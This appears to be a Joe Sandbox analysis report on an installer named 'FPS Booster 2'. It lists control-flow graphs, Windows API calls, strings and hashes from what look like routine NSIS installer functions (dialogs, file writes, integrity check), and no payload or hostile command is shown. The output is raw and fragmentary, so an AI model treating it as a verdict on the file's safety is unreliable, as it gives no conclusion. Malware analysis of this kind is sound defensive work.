                                                control_flow_graph 314 4054a5-4054b7 315 4055f9-405608 314->315 316 4054bd-4054c3 314->316 318 405657-40566c 315->318 319 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 315->319 316->315 317 4054c9-4054d2 316->317 320 4054d4-4054e1 SetWindowPos 317->320 321 4054e7-4054ea 317->321 323 4056ac-4056b1 call 403ddb 318->323 324 40566e-405671 318->324 319->318 320->321 326 405504-40550a 321->326 327 4054ec-4054fe ShowWindow 321->327 332 4056b6-4056d1 323->332 329 405673-40567e call 40139d 324->329 330 4056a4-4056a6 324->330 333 405526-405529 326->333 334 40550c-405521 DestroyWindow 326->334 327->326 329->330 345 405680-40569f SendMessageW 329->345 330->323 331 40594c 330->331 339 40594e-405955 331->339 337 4056d3-4056d5 call 40141d 332->337 338 4056da-4056e0 332->338 342 40552b-405537 SetWindowLongW 333->342 343 40553c-405542 333->343 340 405929-40592f 334->340 337->338 348 4056e6-4056f1 338->348 349 40590a-405923 DestroyWindow EndDialog 338->349 340->331 346 405931-405937 340->346 342->339 350 4055e5-4055f4 call 403df6 343->350 351 405548-405559 GetDlgItem 343->351 345->339 346->331 353 405939-405942 ShowWindow 346->353 348->349 354 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 348->354 349->340 350->339 355 405578-40557b 351->355 356 40555b-405572 SendMessageW IsWindowEnabled 351->356 353->331 384 405746-40574c 354->384 385 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 354->385 357 405580-405583 355->357 358 40557d-40557e 355->358 356->331 356->355 362 405591-405596 357->362 363 405585-40558b 357->363 361 4055ae-4055b3 call 403d44 358->361 361->350 365 4055cc-4055df SendMessageW 362->365 367 405598-40559e 362->367 363->365 366 40558d-40558f 363->366 365->350 366->361 370 4055a0-4055a6 call 40141d 367->370 371 4055b5-4055be call 40141d 367->371 382 4055ac 370->382 371->350 380 4055c0-4055ca 371->380 380->382 382->361 384->385 388 405790 385->388 389 40578d-40578e 385->389 390 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 388->390 389->390 391 4057c2-4057d3 SendMessageW 390->391 392 4057d5 390->392 393 4057db-405812 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 391->393 392->393 401 405817-405819 393->401 401->332 402 40581f-405821 401->402 402->332 403 405827-40582b 402->403 404 40584a-40585e DestroyWindow 403->404 405 40582d-405833 403->405 404->340 407 405864-405891 CreateDialogParamW 404->407 405->331 406 405839-40583f 405->406 406->332 408 405845 406->408 407->340 409 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 407->409 408->331 409->331 414 4058f0-405908 ShowWindow call 403ddb 409->414 414->340
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                • ShowWindow.USER32(?), ref: 004054FE
                                                • DestroyWindow.USER32 ref: 00405512
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                • GetDlgItem.USER32(?,?), ref: 0040554F
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                • ShowWindow.USER32(00000000,?), ref: 00405756
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                • EnableWindow.USER32(?,?), ref: 00405783
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID:
                                                • API String ID: 3282139019-0
                                                • Opcode ID: 4d26819c9312f202396544013fe3d2d1a004a07f50c44ef3b4413d080c8abd80
                                                • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                • Opcode Fuzzy Hash: 4d26819c9312f202396544013fe3d2d1a004a07f50c44ef3b4413d080c8abd80
                                                • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                Control-flow Graph (rendered graph image; legend: Executed / Not Executed)
                                                control_flow_graph 417 405958-405970 call 406328 420 405972-405982 call 405f7d 417->420 421 405984-4059bc call 405eff 417->421 430 4059df-405a08 call 403ec1 call 4067aa 420->430 426 4059d4-4059da lstrcatW 421->426 427 4059be-4059cf call 405eff 421->427 426->430 427->426 435 405a9c-405aa4 call 4067aa 430->435 436 405a0e-405a13 430->436 442 405ab2-405ab9 435->442 443 405aa6-405aad call 406831 435->443 436->435 437 405a19-405a33 call 405eff 436->437 441 405a38-405a41 437->441 441->435 444 405a43-405a47 441->444 446 405ad2-405af7 LoadImageW 442->446 447 405abb-405ac1 442->447 443->442 450 405a49-405a58 call 405d32 444->450 451 405a5b-405a67 lstrlenW 444->451 448 405b92-405b9a call 40141d 446->448 449 405afd-405b3f RegisterClassW 446->449 447->446 452 405ac3-405ac8 call 403ea0 447->452 467 405ba4-405baf call 403ec1 448->467 468 405b9c-405b9f 448->468 453 405c61 449->453 454 405b45-405b8d SystemParametersInfoW CreateWindowExW 449->454 450->451 457 405a69-405a77 lstrcmpiW 451->457 458 405a8f-405a97 call 40674e call 406035 451->458 452->446 463 405c63-405c6a 453->463 454->448 457->458 464 405a79-405a83 GetFileAttributesW 457->464 458->435 469 405a85-405a87 464->469 470 405a89-405a8a call 40677d 464->470 475 405bb5-405bd2 ShowWindow LoadLibraryW 467->475 476 405c38-405c40 call 405073 467->476 468->463 469->458 469->470 470->458 478 405bd4-405bd9 LoadLibraryW 475->478 479 405bdb-405bed GetClassInfoW 475->479 483 405c42-405c48 476->483 484 405c5a-405c5c call 40141d 476->484 478->479 481 405c05-405c28 DialogBoxParamW call 40141d 479->481 482 405bef-405bff GetClassInfoW RegisterClassW 479->482 488 405c2d-405c36 call 403c94 481->488 482->481 483->468 486 405c4e-405c55 call 40141d 483->486 484->453 486->468 488->463
                                                APIs
                                                  • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                  • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                  • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                • lstrlenW.KERNEL32(Show,?,?,?,Show,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                • lstrcmpiW.KERNEL32(?,.exe,Show,?,?,?,Show,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                • GetFileAttributesW.KERNEL32(Show), ref: 00405A7A
                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                  • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: .DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Show$_Nb
                                                • API String ID: 608394941-1865872846
                                                • Opcode ID: d20d728eb82b6ec0bfd99ba95e735b3369be8e81bc17f383275f6e38f7aac643
                                                • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                • Opcode Fuzzy Hash: d20d728eb82b6ec0bfd99ba95e735b3369be8e81bc17f383275f6e38f7aac643
                                                • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                APIs
                                                  • Part of subcall function 6E9E1581: GlobalAlloc.KERNELBASE(00000040,?,6E9E15BA,?,?,6E9E185F,?,6E9E1017), ref: 6E9E158B
                                                  • Part of subcall function 6E9E15A3: lstrcpyW.KERNEL32(00000000,?,?,?,6E9E185F,?,6E9E1017), ref: 6E9E15C1
                                                  • Part of subcall function 6E9E15A3: GlobalFree.KERNEL32 ref: 6E9E15D2
                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 6E9E1D0B
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 6E9E1D59
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 6E9E1D63
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E1D7D
                                                • GlobalFree.KERNEL32(?), ref: 6E9E1E69
                                                • GlobalFree.KERNEL32(?), ref: 6E9E1E6E
                                                • GlobalFree.KERNELBASE(?), ref: 6E9E1E73
                                                • GlobalFree.KERNEL32(00000000), ref: 6E9E201A
                                                • lstrcpyW.KERNEL32(?,?), ref: 6E9E217A
                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6E9E21EE
                                                • LoadLibraryW.KERNEL32(00000008), ref: 6E9E21FF
                                                • lstrcmpiW.KERNEL32(kernel32,00000008), ref: 6E9E221B
                                                • lstrcmpiW.KERNEL32(kernel32.dll,00000008), ref: 6E9E2227
                                                • lstrlenW.KERNEL32(00000808), ref: 6E9E2258
                                                • lstrcatW.KERNEL32(00000808,6E9E30C8), ref: 6E9E227C
                                                • lstrcpyW.KERNEL32(?,00000808), ref: 6E9E22C7
                                                • lstrcatW.KERNEL32(?,00000057), ref: 6E9E22DE
                                                • lstrcatW.KERNEL32(00000808,00000057), ref: 6E9E2307
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602445757.000000006E9E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6E9E0000, based on PE: true
                                                • Associated: 00000007.00000002.2602410980.000000006E9E0000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602469964.000000006E9E3000.00000002.00000001.01000000.0000000B.sdmp
                                                • Associated: 00000007.00000002.2602504176.000000006E9E5000.00000002.00000001.01000000.0000000B.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6e9e0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$lstrcat$Alloclstrcmpi$HandleLibraryLoadModulelstrlen
                                                • String ID: W$kernel32$kernel32.dll
                                                • API String ID: 2496820534-4093004423
                                                • Opcode ID: a5a88b85c5c1632b600f2095ed1c0678d2ba3cb049703146cb72a036ceafcde6
                                                • Instruction ID: 9c25dd1a96d3f0629b8a6c197737099dd6da1b626ed54b611e41eadc8e6bc6d7
                                                • Opcode Fuzzy Hash: a5a88b85c5c1632b600f2095ed1c0678d2ba3cb049703146cb72a036ceafcde6
                                                • Instruction Fuzzy Hash: AB128A71904206DECB56CFEAC8846EEB7B8FF4A315F10492EE365A7990D770D6888F50

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(File: skipped: "C:\Users\user\AppData\Local\Temp\nss20C1.tmp\nsDialogs.dll" (overwriteflag=1),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                • lstrcatW.KERNEL32(00000000,00000000,Show,004D70B0,00000000,00000000), ref: 00401A76
                                                • CompareFileTime.KERNEL32(-00000014,?,Show,Show,00000000,00000000,Show,004D70B0,00000000,00000000), ref: 00401AA0
                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426D70,76F923A0,00000000), ref: 00404FD6
                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FE6
                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D70,76F923A0,00000000), ref: 00404FF9
                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$Show
                                                • API String ID: 4286501637-2784701388
                                                • Opcode ID: 879180ffdf271ada8e3a0b4b989ad1a783c732f8dcb62547d18be893587f2823
                                                • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                • Opcode Fuzzy Hash: 879180ffdf271ada8e3a0b4b989ad1a783c732f8dcb62547d18be893587f2823
                                                • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 927 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 930 403603-403608 927->930 931 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 927->931 932 4037e2-4037e6 930->932 939 403641 931->939 940 403728-403736 call 4032d2 931->940 942 403646-40365d 939->942 946 4037f1-4037f6 940->946 947 40373c-40373f 940->947 944 403661-403663 call 403336 942->944 945 40365f 942->945 951 403668-40366a 944->951 945->944 946->932 949 403741-403752 call 403368 call 403336 947->949 950 40376b-403795 GlobalAlloc call 403368 call 40337f 947->950 971 403757-403759 949->971 950->946 976 403797-4037a8 950->976 954 403670-403677 951->954 955 4037e9-4037f0 call 4032d2 951->955 959 4036f3-4036f7 954->959 960 403679-40368d call 405e38 954->960 955->946 964 403701-403707 959->964 965 4036f9-403700 call 4032d2 959->965 960->964 974 40368f-403696 960->974 967 403716-403720 964->967 968 403709-403713 call 4072ad 964->968 965->964 967->942 975 403726 967->975 968->967 971->946 977 40375f-403765 971->977 974->964 980 403698-40369f 974->980 975->940 981 4037b0-4037b3 976->981 982 4037aa 976->982 977->946 977->950 980->964 983 4036a1-4036a8 980->983 984 4037b6-4037be 981->984 982->981 983->964 985 4036aa-4036b1 983->985 984->984 986 4037c0-4037db SetFilePointer call 405e38 984->986 985->964 987 4036b3-4036d3 985->987 990 4037e0 986->990 987->946 989 4036d9-4036dd 987->989 991 4036e5-4036ed 989->991 992 4036df-4036e3 989->992 990->932 991->964 993 4036ef-4036f1 991->993 992->975 992->991 993->964
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004035C4
                                                • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                  • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                  • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                Strings
                                                • Inst, xrefs: 00403698
                                                • Error launching installer, xrefs: 00403603
                                                • Null, xrefs: 004036AA
                                                • soft, xrefs: 004036A1
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                • API String ID: 4283519449-527102705
                                                • Opcode ID: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                • Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
                                                • Opcode Fuzzy Hash: 60015d4ad0f4b5f5eae55729fc88f45e330dc420916319a7d833a41d7a943f83
                                                • Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

                                                Control-flow Graph (rendered graph image; legend: Executed / Not Executed)
                                                control_flow_graph 994 40337f-403398 995 4033a1-4033a9 994->995 996 40339a 994->996 997 4033b2-4033b7 995->997 998 4033ab 995->998 996->995 999 4033c7-4033d4 call 403336 997->999 1000 4033b9-4033c2 call 403368 997->1000 998->997 1004 4033d6 999->1004 1005 4033de-4033e5 999->1005 1000->999 1006 4033d8-4033d9 1004->1006 1007 403546-403548 1005->1007 1008 4033eb-403432 GetTickCount 1005->1008 1011 403567-40356b 1006->1011 1009 40354a-40354d 1007->1009 1010 4035ac-4035af 1007->1010 1012 403564 1008->1012 1013 403438-403440 1008->1013 1014 403552-40355b call 403336 1009->1014 1015 40354f 1009->1015 1016 4035b1 1010->1016 1017 40356e-403574 1010->1017 1012->1011 1018 403442 1013->1018 1019 403445-403453 call 403336 1013->1019 1014->1004 1027 403561 1014->1027 1015->1014 1016->1012 1022 403576 1017->1022 1023 403579-403587 call 403336 1017->1023 1018->1019 1019->1004 1028 403455-40345e 1019->1028 1022->1023 1023->1004 1031 40358d-40359f WriteFile 1023->1031 1027->1012 1030 403464-403484 call 4076a0 1028->1030 1037 403538-40353a 1030->1037 1038 40348a-40349d GetTickCount 1030->1038 1032 4035a1-4035a4 1031->1032 1033 40353f-403541 1031->1033 1032->1033 1035 4035a6-4035a9 1032->1035 1033->1006 1035->1010 1037->1006 1039 4034e8-4034ec 1038->1039 1040 40349f-4034a7 1038->1040 1043 40352d-403530 1039->1043 1044 4034ee-4034f1 1039->1044 1041 4034a9-4034ad 1040->1041 1042 4034af-4034e5 MulDiv wsprintfW call 404f9e 1040->1042 1041->1039 1041->1042 1042->1039 1043->1013 1048 403536 1043->1048 1046 403513-40351e 1044->1046 1047 4034f3-403507 WriteFile 1044->1047 1051 403521-403525 1046->1051 1047->1033 1050 403509-40350c 1047->1050 1048->1012 1050->1033 1052 40350e-403511 1050->1052 1051->1030 1053 40352b 1051->1053 1052->1051 1053->1012
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 004033F1
                                                • GetTickCount.KERNEL32 ref: 00403492
                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                • wsprintfW.USER32 ref: 004034CE
                                                • WriteFile.KERNELBASE(00000000,00000000,00426D70,00403792,00000000), ref: 004034FF
                                                • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2601246566.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000007.00000002.2601211971.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601284399.0000000000409000.00000002.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000040C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000420000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.0000000000424000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000042C000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601321122.000000000046B000.00000004.00000001.01000000.00000009.sdmp
                                                • Associated: 00000007.00000002.2601570608.00000000005C4000.00000002.00000001.01000000.00000009.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: CountFileTickWrite$wsprintf
                                                • String ID: (]C$... %d%%$pAB$pmB
                                                • API String ID: 651206458-1316446892
                                                • Opcode ID: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
                                                • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                • Opcode Fuzzy Hash: cb4c91118d633cdc657fe6c8c56820a3b26f1ee58aa4180b17ceb2c9431ae53d
                                                • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                Control-flow Graph

                                                APIs
                                                • GetDlgItem.USER32(?,00000000), ref: 6FFB17D8
                                                • GetWindowRect.USER32(00000000,?), ref: 6FFB17E3
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 6FFB17F3
                                                • CreateDialogParamW.USER32(00000001,?,6FFB14FC,00000000), ref: 6FFB1808
                                                • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000014), ref: 6FFB183B
                                                • SetWindowLongW.USER32(?,00000004,6FFB142D), ref: 6FFB1849
                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 6FFB1863
                                                • HeapAlloc.KERNEL32(00000000), ref: 6FFB186A
                                                  • Part of subcall function 6FFB1E83: GlobalAlloc.KERNELBASE(00000040,?,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1E99
                                                  • Part of subcall function 6FFB1E83: lstrcpynW.KERNEL32(00000004,00000104,?,6FFB1061,error,?,00000104,?,00000400), ref: 6FFB1EAF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2602569246.000000006FFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FFB0000, based on PE: true
                                                • Associated: 00000007.00000002.2602537115.000000006FFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602601497.000000006FFB3000.00000002.00000001.01000000.0000000A.sdmp
                                                • Associated: 00000007.00000002.2602632211.000000006FFB6000.00000002.00000001.01000000.0000000A.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_6ffb0000_FPS Booster 2.jbxd
                                                Similarity
                                                • API ID: Window$AllocHeap$CreateDialogGlobalItemLongParamPointsProcessRectlstrcpyn
                                                • String ID: error
                                                • API String ID: 1928716940-1574812785
                                                • Opcode ID: 588f22a66060cd0ad16021208abaed04c10e3ce97eb2e8b0d2d7f76a7d0b7a8e
                                                • Instruction ID: 3dd3985a9bae286674c8705e54a605b37a4a0be389e6d172a0a58bee8a537a1b
                                                • Opcode Fuzzy Hash: 588f22a66060cd0ad16021208abaed04c10e3ce97eb2e8b0d2d7f76a7d0b7a8e
                                                • Instruction Fuzzy Hash: C2211C71964614EFCF11EFA5D989F6E7F78FB4A3A4B00400DF60592360D731A520DB60

                                                Control-flow Graph

